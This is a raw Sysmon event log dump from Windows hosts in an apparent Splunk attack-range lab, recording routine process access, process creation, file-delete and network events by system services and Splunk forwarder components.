10:47:19.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-10B7-6216-F304-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10B7-6216-F304-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.470{C8EA50B7-10B7-6216-F304-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10B8-6216-F604-000000003802}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-10B8-6216-F604-000000003802}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.969{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10B8-6216-F604-000000003802}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.970{C8EA50B7-10B8-6216-F604-000000003802}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB93C788663C2C92063C77C3EE28504,SHA256=C0F577FD7044B5BE7D58E14B551EDE9FF38FB074E0C290DAA7E248B6706A657F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.703{C8EA50B7-10B8-6216-F504-000000003802}51881612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10B8-6216-F504-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-10B8-6216-F504-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.469{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10B8-6216-F504-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.471{C8EA50B7-10B8-6216-F504-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:20.266{C8EA50B7-10B7-6216-F404-000000003802}2960632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:21.828{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=347A600E5FA20782D86569540FD96513,SHA256=A9FF2420D36D6099C071328181C56E93C9B0033A28076D96E2CFA265F1937462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:21.163{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618F4110DC4C5926EFA7861A2AEFEF6B,SHA256=8C384AEAE6D15F30A753F93AA971642E9DFFCEB87FDAA8D58F534239E5E8A660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:22.828{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BE96BA6448D93BCE024934C0D71CEDC,SHA256=44BF248089BDAB325D6B3975E8427DFDC653A8BAEA97B1221B84DB20854D92DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:19.588{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51298-false10.0.1.12-8000- 23542300x8000000000000000216041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 